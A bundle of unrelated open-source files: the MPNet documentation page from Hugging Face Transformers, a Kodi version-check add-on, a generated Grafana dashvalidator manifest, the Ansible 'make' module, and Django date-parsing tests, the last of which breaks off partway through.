The MPNet model was proposed in [MPNet: Masked and Permuted Pre-training for Language Understanding](https://huggingface.co/papers/2004.09297) by Kaitao Song, Xu Tan, Tao Qin, Jianfeng Lu, Tie-Yan Liu.
MPNet adopts a novel pre-training method, named masked and permuted language modeling, to inherit the advantages of
masked language modeling and permuted language modeling for natural language understanding.
The abstract from the paper is the following:
*BERT adopts masked language modeling (MLM) for pre-training and is one of the most successful pre-training models.
Since BERT neglects dependency among predicted tokens, XLNet introduces permuted language modeling (PLM) for
pre-training to address this problem. However, XLNet does not leverage the full position information of a sentence and
thus suffers from position discrepancy between pre-training and fine-tuning. In this paper, we propose MPNet, a novel
pre-training method that inherits the advantages of BERT and XLNet and avoids their limitations. MPNet leverages the
dependency among predicted tokens through permuted language modeling (vs. MLM in BERT), and takes auxiliary position
information as input to make the model see a full sentence and thus reducing the position discrepancy (vs. PLM in
XLNet). We pre-train MPNet on a large-scale dataset (over 160GB text corpora) and fine-tune on a variety of
down-streaming tasks (GLUE, SQuAD, etc). Experimental results show that MPNet outperforms MLM and PLM by a large
margin, and achieves better results on these tasks compared with previous state-of-the-art pre-trained methods (e.g.,
BERT, XLNet, RoBERTa) under the same model setting.*
The original code can be found [here](https://github.com/microsoft/MPNet).
## Usage tips
MPNet doesn't have `token_type_ids`, you don't need to indicate which token belongs to which segment. Just
separate your segments with the separation token `tokenizer.sep_token` (or `[sep]`).
## Resources
- [Text classification task guide](../tasks/sequence_classification)
- [Token classification task guide](../tasks/token_classification)
- [Question answering task guide](../tasks/question_answering)
- [Masked language modeling task guide](../tasks/masked_language_modeling)
- [Multiple choice task guide](../tasks/multiple_choice)
## MPNetConfig
[[autodoc]] MPNetConfig
## MPNetTokenizer
[[autodoc]] MPNetTokenizer
- get_special_tokens_mask
- save_vocabulary
## MPNetTokenizerFast
[[autodoc]] MPNetTokenizerFast
## MPNetModel
[[autodoc]] MPNetModel
- forward
## MPNetForMaskedLM
[[autodoc]] MPNetForMaskedLM
- forward
## MPNetForSequenceClassification
[[autodoc]] MPNetForSequenceClassification
- forward
## MPNetForMultipleChoice
[[autodoc]] MPNetForMultipleChoice
- forward
## MPNetForTokenClassification
[[autodoc]] MPNetForTokenClassification
- forward
## MPNetForQuestionAnswering
[[autodoc]] MPNetForQuestionAnswering
- forward | unknown | github | https://github.com/huggingface/transformers | docs/source/en/model_doc/mpnet.md |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Team-XBMC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import platform
import xbmc
import lib.common
from lib.common import log, dialog_yesno
from lib.common import upgrade_message as _upgrademessage
from lib.common import upgrade_message2 as _upgrademessage2
ADDON = lib.common.ADDON
ADDONVERSION = lib.common.ADDONVERSION
ADDONNAME = lib.common.ADDONNAME
ADDONPATH = lib.common.ADDONPATH
ICON = lib.common.ICON
oldversion = False
class Main:
def __init__(self):
linux = False
packages = []
xbmc.sleep(5000)
if xbmc.getCondVisibility('System.Platform.Linux') and ADDON.getSetting("upgrade_apt") == 'true':
packages = ['kodi']
_versionchecklinux(packages)
else:
oldversion, version_installed, version_available, version_stable = _versioncheck()
if oldversion:
_upgrademessage2( version_installed, version_available, version_stable, oldversion, False)
def _versioncheck():
# initial vars
from lib.jsoninterface import get_installedversion, get_versionfilelist
from lib.versions import compare_version
# retrieve versionlists from supplied version file
versionlist = get_versionfilelist()
# retrieve version installed
version_installed = get_installedversion()
# copmpare installed and available
oldversion, version_installed, version_available, version_stable = compare_version(version_installed, versionlist)
return oldversion, version_installed, version_available, version_stable
def _versionchecklinux(packages):
if platform.dist()[0].lower() in ['ubuntu', 'debian', 'linuxmint']:
handler = False
result = False
try:
# try aptdeamon first
from lib.aptdeamonhandler import AptdeamonHandler
handler = AptdeamonHandler()
except:
# fallback to shell
# since we need the user password, ask to check for new version first
from lib.shellhandlerapt import ShellHandlerApt
sudo = True
handler = ShellHandlerApt(sudo)
if dialog_yesno(32015):
pass
elif dialog_yesno(32009, 32010):
log("disabling addon by user request")
ADDON.setSetting("versioncheck_enable", 'false')
return
if handler:
if handler.check_upgrade_available(packages[0]):
if _upgrademessage(32012, oldversion, True):
if ADDON.getSetting("upgrade_system") == "false":
result = handler.upgrade_package(packages[0])
else:
result = handler.upgrade_system()
if result:
from lib.common import message_upgrade_success, message_restart
message_upgrade_success()
message_restart()
else:
log("Error during upgrade")
else:
log("Error: no handler found")
else:
log("Unsupported platform %s" %platform.dist()[0])
sys.exit(0)
if (__name__ == "__main__"):
log('Version %s started' % ADDONVERSION)
Main() | unknown | codeparrot/codeparrot-clean | ||
//
// This file is generated by grafana-app-sdk
// DO NOT EDIT
//
package manifestdata
import (
"encoding/json"
"fmt"
"strings"
"github.com/grafana/grafana-app-sdk/app"
"github.com/grafana/grafana-app-sdk/resource"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/kube-openapi/pkg/spec3"
"k8s.io/kube-openapi/pkg/validation/spec"
v1alpha1 "github.com/grafana/grafana/apps/dashvalidator/pkg/apis/dashvalidator/v1alpha1"
)
var (
rawSchemaDashboardCompatibilityScorev1alpha1 = []byte(`{"DashboardCompatibilityScore":{"properties":{"spec":{"$ref":"#/components/schemas/spec"},"status":{"$ref":"#/components/schemas/status"}},"required":["spec"]},"DataSourceMapping":{"additionalProperties":false,"description":"DataSourceMapping specifies a datasource to validate dashboard queries against.\nMaps logical datasource references in the dashboard to actual datasource instances.","properties":{"name":{"description":"Optional human-readable name for display in results.\nIf not provided, UID will be used in error messages.\nExample: \"Production Prometheus (US-West)\"","type":"string"},"type":{"description":"Type of datasource plugin.\nMVP: Only \"prometheus\" supported.\nFuture: \"mysql\", \"postgres\", \"elasticsearch\", etc.","type":"string"},"uid":{"description":"Unique identifier of the datasource instance.\nExample: \"prometheus-prod-us-west\"","type":"string"}},"required":["uid","type"],"type":"object"},"DataSourceResult":{"additionalProperties":false,"description":"DataSourceResult contains validation results for a single datasource.\nProvides aggregate statistics and per-query breakdown of compatibility.","properties":{"checkedQueries":{"description":"Number of queries successfully validated.\nMay be less than totalQueries if some queries couldn't be parsed.","type":"integer"},"compatibilityScore":{"description":"Overall compatibility score for this datasource (0-100).\nCalculated as: (foundMetrics / totalMetrics) * 100\nUsed to calculate the global compatibilityScore in status.","type":"number"},"foundMetrics":{"description":"Number of metrics that exist in the datasource schema.\nfoundMetrics \u003c= totalMetrics","type":"integer"},"missingMetrics":{"description":"Array of metric names that were referenced but don't exist.\nUseful for debugging why a dashboard shows \"no data\".\nExample for Prometheus: [\"http_requests_total\", \"api_latency_seconds\"]","items":{"type":"string"},"type":"array"},"name":{"description":"Optional display name (matches DataSourceMapping.name if provided)","type":"string"},"queryBreakdown":{"description":"Per-query breakdown showing which specific queries have issues.\nOne entry per query target (refId: \"A\", \"B\", \"C\", etc.) in each panel.\nAllows pinpointing exactly which panel/query needs fixing.","items":{"$ref":"#/components/schemas/QueryBreakdown"},"type":"array"},"totalMetrics":{"description":"Total number of unique metrics/identifiers referenced across all queries.\nFor Prometheus: metric names extracted from PromQL expressions.\nFor SQL datasources: table and column names.","type":"integer"},"totalQueries":{"description":"Total number of queries in the dashboard targeting this datasource.\nIncludes all panel targets/queries that reference this datasource.","type":"integer"},"type":{"description":"Datasource type (matches DataSourceMapping.type)","type":"string"},"uid":{"description":"Datasource UID that was validated (matches DataSourceMapping.uid)","type":"string"}},"required":["uid","type","totalQueries","checkedQueries","totalMetrics","foundMetrics","missingMetrics","queryBreakdown","compatibilityScore"],"type":"object"},"OperatorState":{"additionalProperties":false,"properties":{"descriptiveState":{"description":"descriptiveState is an optional more descriptive state field which has no requirements on format","type":"string"},"details":{"additionalProperties":true,"description":"details contains any extra information that is operator-specific","type":"object"},"lastEvaluation":{"description":"lastEvaluation is the ResourceVersion last evaluated","type":"string"},"state":{"description":"state describes the state of the lastEvaluation.\nIt is limited to three possible states for machine evaluation.","enum":["success","in_progress","failed"],"type":"string"}},"required":["lastEvaluation","state"],"type":"object"},"QueryBreakdown":{"additionalProperties":false,"description":"QueryBreakdown provides compatibility details for a single query within a panel.\nGranular per-query results allow users to identify exactly which queries need fixing.\n\nNote: A panel can have multiple queries (refId: \"A\", \"B\", \"C\", etc.),\nso there may be multiple QueryBreakdown entries for the same panelID.","properties":{"compatibilityScore":{"description":"Compatibility percentage for this individual query (0-100).\nCalculated as: (foundMetrics / totalMetrics) * 100\n100 = query will work perfectly, 0 = query will return no data.","type":"number"},"foundMetrics":{"description":"Number of those metrics that exist in the datasource.\nfoundMetrics \u003c= totalMetrics","type":"integer"},"missingMetrics":{"description":"Array of missing metric names specific to this query.\nHelps identify exactly which part of a query expression will fail.\nEmpty array means query is fully compatible.","items":{"type":"string"},"type":"array"},"panelID":{"description":"Numeric panel ID from dashboard JSON.\nUsed to correlate with dashboard structure.","type":"integer"},"panelTitle":{"description":"Human-readable panel title for context.\nExample: \"CPU Usage\", \"Request Rate\"","type":"string"},"queryRefId":{"description":"Query identifier within the panel.\nValues: \"A\", \"B\", \"C\", etc. (from panel.targets[].refId)\nUniquely identifies which query in a multi-query panel this refers to.","type":"string"},"totalMetrics":{"description":"Number of unique metrics referenced in this specific query.\nFor Prometheus: metrics extracted from the PromQL expr.\nExample: rate(http_requests_total[5m]) references 1 metric.","type":"integer"}},"required":["panelTitle","panelID","queryRefId","totalMetrics","foundMetrics","missingMetrics","compatibilityScore"],"type":"object"},"spec":{"additionalProperties":false,"properties":{"dashboardJson":{"additionalProperties":true,"description":"Complete dashboard JSON object to validate.\nMust be a v1 dashboard schema (contains \"panels\" array).\nv2 dashboards (with \"elements\" structure) are not yet supported.","type":"object"},"datasourceMappings":{"description":"Array of datasources to validate against.\nThe validator will check dashboard queries against each datasource\nand provide per-datasource compatibility results.\n\nMVP: Only single datasource supported (array length = 1), Prometheus type only.\nFuture: Will support multiple datasources for dashboards with mixed queries.","items":{"$ref":"#/components/schemas/DataSourceMapping"},"type":"array"}},"required":["dashboardJson","datasourceMappings"],"type":"object"},"status":{"additionalProperties":false,"properties":{"additionalFields":{"additionalProperties":true,"description":"additionalFields is reserved for future use","type":"object"},"compatibilityScore":{"description":"Overall compatibility score across all datasources (0-100).\nCalculated as: (total found metrics / total referenced metrics) * 100\n\nScore interpretation:\n- 100: Perfect compatibility, all queries will work\n- 80-99: Excellent, minor missing metrics\n- 50-79: Fair, significant missing metrics\n- 0-49: Poor, most queries will fail","type":"number"},"datasourceResults":{"description":"Per-datasource validation results.\nArray length matches spec.datasourceMappings.\nEach element contains detailed metrics and query-level breakdown.","items":{"$ref":"#/components/schemas/DataSourceResult"},"type":"array"},"lastChecked":{"description":"ISO 8601 timestamp of when validation was last performed.\nExample: \"2024-01-15T10:30:00Z\"","type":"string"},"message":{"description":"Human-readable summary of validation result.\nExamples: \"All queries compatible\", \"3 missing metrics found\"","type":"string"},"operatorStates":{"additionalProperties":{"$ref":"#/components/schemas/OperatorState"},"description":"operatorStates is a map of operator ID to operator state evaluations.\nAny operator which consumes this kind SHOULD add its state evaluation information to this field.","type":"object"}},"required":["compatibilityScore","datasourceResults"],"type":"object"}}`)
versionSchemaDashboardCompatibilityScorev1alpha1 app.VersionSchema
_ = json.Unmarshal(rawSchemaDashboardCompatibilityScorev1alpha1, &versionSchemaDashboardCompatibilityScorev1alpha1)
)
var appManifestData = app.ManifestData{
AppName: "dashvalidator",
Group: "dashvalidator.grafana.app",
PreferredVersion: "v1alpha1",
Versions: []app.ManifestVersion{
{
Name: "v1alpha1",
Served: true,
Kinds: []app.ManifestVersionKind{
{
Kind: "DashboardCompatibilityScore",
Plural: "DashboardCompatibilityScores",
Scope: "Namespaced",
Conversion: false,
Schema: &versionSchemaDashboardCompatibilityScorev1alpha1,
},
},
Routes: app.ManifestVersionRoutes{
Namespaced: map[string]spec3.PathProps{
"/check": {
Post: &spec3.Operation{
OperationProps: spec3.OperationProps{
OperationId: "createCheck",
RequestBody: &spec3.RequestBody{
RequestBodyProps: spec3.RequestBodyProps{
Required: true,
Content: map[string]*spec3.MediaType{
"application/json": {
MediaTypeProps: spec3.MediaTypeProps{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
Properties: map[string]spec.Schema{
"dashboardJson": {
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
AdditionalProperties: &spec.SchemaOrBool{
Allows: true,
},
},
},
"datasourceMappings": {
SchemaProps: spec.SchemaProps{
Type: []string{"array"},
Items: &spec.SchemaOrArray{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
Properties: map[string]spec.Schema{
"name": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"type": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"uid": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
},
Required: []string{
"uid",
"type",
},
}},
},
},
},
},
Required: []string{
"dashboardJson",
"datasourceMappings",
},
}},
}},
},
}},
Responses: &spec3.Responses{
ResponsesProps: spec3.ResponsesProps{
Default: &spec3.Response{
ResponseProps: spec3.ResponseProps{
Description: "Default OK response",
Content: map[string]*spec3.MediaType{
"application/json": {
MediaTypeProps: spec3.MediaTypeProps{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
Properties: map[string]spec.Schema{
"apiVersion": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
Description: "APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources",
},
},
"compatibilityScore": {
SchemaProps: spec.SchemaProps{
Type: []string{"number"},
},
},
"datasourceResults": {
SchemaProps: spec.SchemaProps{
Type: []string{"array"},
Items: &spec.SchemaOrArray{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
Properties: map[string]spec.Schema{
"checkedQueries": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"compatibilityScore": {
SchemaProps: spec.SchemaProps{
Type: []string{"number"},
},
},
"foundMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"missingMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"array"},
Items: &spec.SchemaOrArray{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
}},
},
},
},
"name": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"queryBreakdown": {
SchemaProps: spec.SchemaProps{
Type: []string{"array"},
Items: &spec.SchemaOrArray{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"object"},
Properties: map[string]spec.Schema{
"compatibilityScore": {
SchemaProps: spec.SchemaProps{
Type: []string{"number"},
},
},
"foundMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"missingMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"array"},
Items: &spec.SchemaOrArray{
Schema: &spec.Schema{
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
}},
},
},
},
"panelID": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"panelTitle": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"queryRefId": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"totalMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
},
Required: []string{
"panelTitle",
"panelID",
"queryRefId",
"totalMetrics",
"foundMetrics",
"missingMetrics",
"compatibilityScore",
},
}},
},
},
},
"totalMetrics": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"totalQueries": {
SchemaProps: spec.SchemaProps{
Type: []string{"integer"},
},
},
"type": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
"uid": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
},
},
},
Required: []string{
"uid",
"type",
"totalQueries",
"checkedQueries",
"totalMetrics",
"foundMetrics",
"missingMetrics",
"queryBreakdown",
"compatibilityScore",
},
}},
},
},
},
"kind": {
SchemaProps: spec.SchemaProps{
Type: []string{"string"},
Description: "Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds",
},
},
},
Required: []string{
"compatibilityScore",
"datasourceResults",
"apiVersion",
"kind",
},
}},
}},
},
},
},
}},
},
},
},
},
Cluster: map[string]spec3.PathProps{},
Schemas: map[string]spec.Schema{},
},
},
},
}
func LocalManifest() app.Manifest {
return app.NewEmbeddedManifest(appManifestData)
}
func RemoteManifest() app.Manifest {
return app.NewAPIServerManifest("dashvalidator")
}
var kindVersionToGoType = map[string]resource.Kind{
"DashboardCompatibilityScore/v1alpha1": v1alpha1.DashboardCompatibilityScoreKind(),
}
// ManifestGoTypeAssociator returns the associated resource.Kind instance for a given Kind and Version, if one exists.
// If there is no association for the provided Kind and Version, exists will return false.
func ManifestGoTypeAssociator(kind, version string) (goType resource.Kind, exists bool) {
goType, exists = kindVersionToGoType[fmt.Sprintf("%s/%s", kind, version)]
return goType, exists
}
var customRouteToGoResponseType = map[string]any{
"v1alpha1||<namespace>/check|POST": v1alpha1.CreateCheckResponse{},
}
// ManifestCustomRouteResponsesAssociator returns the associated response go type for a given kind, version, custom route path, and method, if one exists.
// kind may be empty for custom routes which are not kind subroutes. Leading slashes are removed from subroute paths.
// If there is no association for the provided kind, version, custom route path, and method, exists will return false.
// Resource routes (those without a kind) should prefix their route with "<namespace>/" if the route is namespaced (otherwise the route is assumed to be cluster-scope)
func ManifestCustomRouteResponsesAssociator(kind, version, path, verb string) (goType any, exists bool) {
if len(path) > 0 && path[0] == '/' {
path = path[1:]
}
goType, exists = customRouteToGoResponseType[fmt.Sprintf("%s|%s|%s|%s", version, kind, path, strings.ToUpper(verb))]
return goType, exists
}
var customRouteToGoParamsType = map[string]runtime.Object{}
func ManifestCustomRouteQueryAssociator(kind, version, path, verb string) (goType runtime.Object, exists bool) {
if len(path) > 0 && path[0] == '/' {
path = path[1:]
}
goType, exists = customRouteToGoParamsType[fmt.Sprintf("%s|%s|%s|%s", version, kind, path, strings.ToUpper(verb))]
return goType, exists
}
var customRouteToGoRequestBodyType = map[string]any{
"v1alpha1||<namespace>/check|POST": v1alpha1.CreateCheckRequestBody{},
}
func ManifestCustomRouteRequestBodyAssociator(kind, version, path, verb string) (goType any, exists bool) {
if len(path) > 0 && path[0] == '/' {
path = path[1:]
}
goType, exists = customRouteToGoRequestBodyType[fmt.Sprintf("%s|%s|%s|%s", version, kind, path, strings.ToUpper(verb))]
return goType, exists
}
type GoTypeAssociator struct{}
func NewGoTypeAssociator() *GoTypeAssociator {
return &GoTypeAssociator{}
}
func (g *GoTypeAssociator) KindToGoType(kind, version string) (goType resource.Kind, exists bool) {
return ManifestGoTypeAssociator(kind, version)
}
func (g *GoTypeAssociator) CustomRouteReturnGoType(kind, version, path, verb string) (goType any, exists bool) {
return ManifestCustomRouteResponsesAssociator(kind, version, path, verb)
}
func (g *GoTypeAssociator) CustomRouteQueryGoType(kind, version, path, verb string) (goType runtime.Object, exists bool) {
return ManifestCustomRouteQueryAssociator(kind, version, path, verb)
}
func (g *GoTypeAssociator) CustomRouteRequestBodyGoType(kind, version, path, verb string) (goType any, exists bool) {
return ManifestCustomRouteRequestBodyAssociator(kind, version, path, verb)
} | go | github | https://github.com/grafana/grafana | apps/dashvalidator/pkg/apis/manifestdata/dashvalidator_manifest.go |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Linus Unnebäck <linus@folkdatorn.se>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: make
short_description: Run targets in a Makefile
requirements:
- make
version_added: "2.1"
author: Linus Unnebäck (@LinusU) <linus@folkdatorn.se>
description:
- Run targets in a Makefile.
options:
target:
description:
- The target to run.
- Typically this would be something like C(install),C(test) or C(all)."
type: str
params:
description:
- Any extra parameters to pass to make.
type: dict
chdir:
description:
- Change to this directory before running make.
type: path
required: true
file:
description:
- Use a custom Makefile.
type: path
version_added: '2.5'
'''
EXAMPLES = r'''
- name: Build the default target
make:
chdir: /home/ubuntu/cool-project
- name: Run 'install' target as root
make:
chdir: /home/ubuntu/cool-project
target: install
become: yes
- name: Build 'all' target with extra arguments
make:
chdir: /home/ubuntu/cool-project
target: all
params:
NUM_THREADS: 4
BACKEND: lapack
- name: Build 'all' target with a custom Makefile
make:
chdir: /home/ubuntu/cool-project
target: all
file: /some-project/Makefile
'''
RETURN = r'''# '''
from ansible.module_utils.six import iteritems
from ansible.module_utils.basic import AnsibleModule
def run_command(command, module, check_rc=True):
"""
Run a command using the module, return
the result code and std{err,out} content.
:param command: list of command arguments
:param module: Ansible make module instance
:return: return code, stdout content, stderr content
"""
rc, out, err = module.run_command(command, check_rc=check_rc, cwd=module.params['chdir'])
return rc, sanitize_output(out), sanitize_output(err)
def sanitize_output(output):
"""
Sanitize the output string before we
pass it to module.fail_json. Defaults
the string to empty if it is None, else
strips trailing newlines.
:param output: output to sanitize
:return: sanitized output
"""
if output is None:
return ''
else:
return output.rstrip("\r\n")
def main():
module = AnsibleModule(
argument_spec=dict(
target=dict(type='str'),
params=dict(type='dict'),
chdir=dict(type='path', required=True),
file=dict(type='path'),
),
supports_check_mode=True,
)
# Build up the invocation of `make` we are going to use
# For non-Linux OSes, prefer gmake (GNU make) over make
make_path = module.get_bin_path('gmake', required=False)
if not make_path:
# Fall back to system make
make_path = module.get_bin_path('make', required=True)
make_target = module.params['target']
if module.params['params'] is not None:
make_parameters = [k + '=' + str(v) for k, v in iteritems(module.params['params'])]
else:
make_parameters = []
if module.params['file'] is not None:
base_command = [make_path, "--file", module.params['file'], make_target]
else:
base_command = [make_path, make_target]
base_command.extend(make_parameters)
# Check if the target is already up to date
rc, out, err = run_command(base_command + ['--question'], module, check_rc=False)
if module.check_mode:
# If we've been asked to do a dry run, we only need
# to report whether or not the target is up to date
changed = (rc != 0)
else:
if rc == 0:
# The target is up to date, so we don't have to
# do anything
changed = False
else:
# The target isn't up to date, so we need to run it
rc, out, err = run_command(base_command, module,
check_rc=True)
changed = True
# We don't report the return code, as if this module failed
# we would be calling fail_json from run_command, so even if
# we had a non-zero return code, we did not fail. However, if
# we report a non-zero return code here, we will be marked as
# failed regardless of what we signal using the failed= kwarg.
module.exit_json(
changed=changed,
failed=False,
stdout=out,
stderr=err,
target=module.params['target'],
params=module.params['params'],
chdir=module.params['chdir'],
file=module.params['file']
)
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
import unittest
from datetime import date, datetime, time, timedelta
from django.utils.dateparse import (
parse_date,
parse_datetime,
parse_duration,
parse_time,
)
from django.utils.timezone import get_fixed_timezone
class DateParseTests(unittest.TestCase):
def test_parse_date(self):
# Valid inputs
self.assertEqual(parse_date("2012-04-23"), date(2012, 4, 23))
self.assertEqual(parse_date("2012-4-9"), date(2012, 4, 9))
self.assertEqual(parse_date("20120423"), date(2012, 4, 23))
# Invalid inputs
self.assertIsNone(parse_date("2012423"))
with self.assertRaises(ValueError):
parse_date("2012-04-56")
def test_parse_time(self):
# Valid inputs
self.assertEqual(parse_time("09:15:00"), time(9, 15))
self.assertEqual(parse_time("091500"), time(9, 15))
self.assertEqual(parse_time("10:10"), time(10, 10))
self.assertEqual(parse_time("10:20:30.400"), time(10, 20, 30, 400000))
self.assertEqual(parse_time("10:20:30,400"), time(10, 20, 30, 400000))
self.assertEqual(parse_time("4:8:16"), time(4, 8, 16))
# Time zone offset is ignored.
self.assertEqual(parse_time("00:05:23+04:00"), time(0, 5, 23))
# Invalid inputs
self.assertIsNone(parse_time("00:05:"))
self.assertIsNone(parse_time("00:05:23,"))
self.assertIsNone(parse_time("00:05:23+"))
self.assertIsNone(parse_time("00:05:23+25:00"))
self.assertIsNone(parse_time("4:18:101"))
self.assertIsNone(parse_time("91500"))
with self.assertRaises(ValueError):
parse_time("09:15:90")
def test_parse_datetime(self):
valid_inputs = (
("2012-04-23", datetime(2012, 4, 23)),
("2012-04-23T09:15:00", datetime(2012, 4, 23, 9, 15)),
("2012-4-9 4:8:16", datetime(2012, 4, 9, 4, 8, 16)),
(
"2012-04-23T09:15:00Z",
datetime(2012, 4, 23, 9, 15, 0, 0, get_fixed_timezone(0)),
),
(
"2012-4-9 4:8:16-0320",
datetime(2012, 4, 9, 4, 8, 16, 0, get_fixed_timezone(-200)),
),
(
"2012-04-23T10:20:30.400+02:30",
datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(150)),
),
(
"2012-04-23T10:20:30.400+02",
datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(120)),
),
(
"2012-04-23T10:20:30.400-02",
datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(-120)),
),
(
"2012-04-23T10:20:30,400-02",
datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(-120)),
),
(
"2012-04-23T10:20:30.400 +0230",
datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(150)),
),
(
"2012-04-23T10:20:30,400 +00",
datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(0)),
),
(
"2012-04-23T10:20:30 -02",
datetime(2012, 4, 23, 10, 20, 30, 0, get_fixed_timezone(-120)),
),
)
for source, expected in valid_inputs:
with self.subTest(source=source):
self.assertEqual(parse_datetime(source), expected)
# Invalid inputs
self.assertIsNone(parse_datetime("20120423091500"))
with self.assertRaises(ValueError):
parse_datetime("2012-04-56T09:15:90")
class DurationParseTests(unittest.TestCase):
def test_parse_python_format(self):
timedeltas = [
timedelta(
days=4, minutes=15, seconds=30, milliseconds=100
), # fractions of seconds
timedelta(hours=10, minutes=15, seconds=30), # hours, minutes, seconds
timedelta(days=4, minutes=15, seconds=30), # multiple days
timedelta(days=1, minutes=00, seconds=00), # single day
timedelta(days=-4, minutes=15, seconds=30), # negative durations
timedelta(minutes=15, seconds=30), # minute & seconds
timedelta(seconds=30), # seconds
]
for delta in timedeltas:
with self.subTest(delta=delta):
self.assertEqual(parse_duration(format(delta)), delta)
def test_parse_postgresql_format(self):
test_values = (
("1 day", timedelta(1)),
("-1 day", timedelta(-1)),
("1 day 0:00:01", timedelta(days=1, seconds=1)),
("1 day -0:00:01", timedelta(days=1, seconds=-1)),
("-1 day -0:00:01", timedelta(days=-1, seconds=-1)),
("-1 day +0:00:01", timedelta(days=-1, seconds=1)),
(
"4 days 0:15:30.1",
timedelta(days=4, minutes=15, seconds=30, milliseconds=100),
),
(
"4 days 0:15:30.0001",
timedelta(days=4, minutes=15, seconds=30, microseconds=100),
),
("-4 days -15:00:30", timedelta(days=-4, hours=-15, seconds=-30)),
)
for source, expected in test_values:
with self.subTest(source=source):
self.assertEqual(parse_duration(source), expected)
def test_seconds(self):
self.assertEqual(parse_duration("30"), timedelta(seconds=30))
def test_minutes_seconds(self):
self.assertEqual(parse_duration("15:30"), timedelta(minutes=15, seconds=30))
self.assertEqual(parse_duration("5:30"), timedelta(minutes=5, seconds=30))
def test_hours_minutes_seconds(self):
self.assertEqual(
parse_duration("10:15:30"), timedelta(hours=10, minutes=15, seconds=30)
)
self.assertEqual(
parse_duration("1:15:30"), timedelta(hours=1, minutes=15, seconds=30)
)
self.assertEqual(
parse_duration("100:200:300"),
timedelta(hours=100, minutes=200, seconds=300),
)
def test_days(self):
self.assertEqual(
parse_duration("4 15:30"), timedelta(days=4, minutes=15, seconds=30)
)
self.assertEqual(
parse_duration("4 10:15:30"),
timedelta(days=4, hours=10, minutes=15, seconds=30),
)
def test_fractions_of_seconds(self):
test_values = (
("15:30.1", timedelta(minutes=15, seconds=30, milliseconds=100)),
("15:30.01", timedelta(minutes=15, seconds=30, milliseconds=10)),
("15:30.001", timedelta(minutes=15, seconds=30, milliseconds=1)),
("15:30.0001", timedelta(minutes=15, seconds=30, microseconds=100)),
("15:30.00001", timedelta(minutes=15, seconds=30, microseconds=10)),
("15:30.000001", timedelta(minutes=15, seconds=30, microseconds=1)),
("15:30,000001", timedelta(minutes=15, seconds=30, microseconds=1)),
)
for source, expected in test_values:
with self.subTest(source=source):
self.assertEqual(parse_duration(source), expected)
def test_negative(self):
test_values = (
("-4 15:30", timedelta(days=-4, minutes=15, seconds=30)),
("-172800", timedelta(days=-2)),
("-15:30", timedelta(minutes=-15, seconds=-30)),
("-1:15:30", timedelta(hours=-1, minutes=-15, seconds=-30)),
("-30.1", timedelta(seconds=-30, milliseconds=-100)),
("-30,1", timedelta(seconds=-30, milliseconds=-100)),
("-00:01:01", timedelta(minutes=-1, seconds=-1)),
("-01:01", timedelta(seconds=-61)),
("-01:-01", None),
)
for source, expected in test_values:
with self.subTest(source=source):
self.assertEqual(parse_duration(source), expected)
def test_iso_8601(self):
test_values = (
("P4Y", None),
("P4M", None),
("P4W", timedelta(weeks=4)),
("P0.5W", timedelta(weeks=0.5)),
("P0,5W", timedelta(weeks=0.5)),
("-P0.5W", timedelta(weeks=-0.5)),
("P1W1D", timedelta(weeks=1, days=1)),
